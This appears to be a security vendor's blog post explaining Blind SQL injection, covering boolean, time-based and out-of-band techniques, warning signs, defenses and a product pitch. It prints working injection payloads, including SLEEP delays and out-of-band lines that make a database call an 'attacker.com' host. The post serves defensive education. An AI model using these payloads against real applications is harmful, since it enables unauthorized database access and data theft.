SQL Injection is one of the oldest tricks in the attacker's playbook, yet it continues to compromise modern applications in clever new ways. While most developers are (hopefully) sanitizing user input and patching up obvious injection holes, Blind SQL Injection (Blind SQLi) lurks beneath the surface, harder to detect and just as dangerous. It doesn’t throw obvious errors or give away secrets in plain sight. Instead, it whispers through behavior changes, timing delays, and out-of-band signals.
In this post, we’ll break down how Blind SQLi works, how attackers silently exfiltrate data from hardened applications, and how tools like Hadrian can help detect and defend against these quiet attacks before they turn critical.
What is Blind SQL Injection?
In a typical SQL Injection, attackers inject malicious SQL statements directly into input fields to retrieve data, bypass authentication, or even compromise servers. These attacks often produce visible errors, data leaks, or debug output that makes exploitation easy.
Blind SQLi, however, is more subtle. It happens when the application interacts with a database but does not return any error messages or useful content to the attacker. Instead, the attacker must infer success or failure by observing indirect clues, such as:
- Differences in page content
- HTTP response codes
- Response time delays
- External (out-of-band) interactions
Blind SQLi is typically categorized into three main types:
- Boolean-based: Uses true/false conditions to alter responses.
- Time-based: Relies on query delays to confirm execution.
- Out-of-Band (OOB): Sends data to external systems (e.g. DNS or HTTP callbacks).
Despite its subtlety, Blind SQLi can be every bit as powerful as classic SQLi, often flying under security teams
How Attackers Exploit Blind SQLi
Let’s walk through how each Blind SQLi technique works, including real payload examples, tools, and detection tricks.
Boolean-based Blind SQLi
This method uses conditional logic (like 1=1 or 1=2 ) to test if the application returns different content for true vs false conditions.
Example:
?id=5 AND 1=1 -- true condition
?id=5 AND 1=2 -- false conditionIf the page renders differently between the two, the app is likely vulnerable.
Use case: Useful when the app doesn’t return verbose errors but gives slightly different responses.
Time-based Blind SQLi
Here, attackers inject time delays (e.g., via SLEEP() or pg_sleep()) and measure the application’s response time.
?id=1' AND IF(1=1, SLEEP(5), 0)-- -
?id=1' AND IF(1=1, SLEEP(5), 0)-- -If the server pauses before responding, the condition is evaluated as true.
Variants:
- MySQL: SLEEP(n)
- PostgreSQL: pg_sleep(n)
- MSSQL: WAITFOR DELAY '0:0:n'
Gotchas: Time-based attacks can be noisy and slow but are powerful against apps that sanitize output.
Out-of-Band (OOB) Blind SQLi
OOB attacks exploit database features that cause the server to interact with external systems like DNS or HTTP servers.
Example:
SELECT load_file('\\attacker.com\payload')Or for MSSQL:
EXEC master..xp_dirtree '//attacker.com/a'When successful, the database makes a request to the attacker-controlled server, confirming the injection.
Advantage: Works even when content and time-based tests are neutralized. Requires egress permissions.
5 Signs You Might Be Vulnerable to Blind SQLi
- Your app behaves inconsistently to small variations in user input.
- Response times noticeably vary when certain payloads are submitted.
- Errors are suppressed globally (e.g., with `display_errors=0`), masking deeper issues.
- The app fails to validate or sanitize input before it hits the DB layer.
- External services detect DNS lookups or HTTP callbacks from your app after specific interactions.
Defense Strategies
Preventing Blind SQLi requires layered defenses:
- Always use parameterized queries with bound parameters.
Example:
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))- Avoid string concatenation when building queries.
- Enable logging of slow queries and DNS activity.
- Use behavior-based WAF rules, not just static signatures.
- Monitor for OOB activity like unexpected DNS or HTTP traffic.
Blind SQL Injection doesn’t scream for attention — it whispers. And that whisper can turn into a shout when attackers extract data without triggering alarms. As applications become more complex and defenses shift toward surface-level filtering, Blind SQLi remains a powerful tool in the offensive security arsenal.
Want to know if your app is vulnerable to Blind SQLi — without waiting for a breach? Hadrian’s offensive security platform continuously tests your digital assets the way real attackers do, surfacing even the quietest vulnerabilities.
Stay vigilant. Stay offensive.
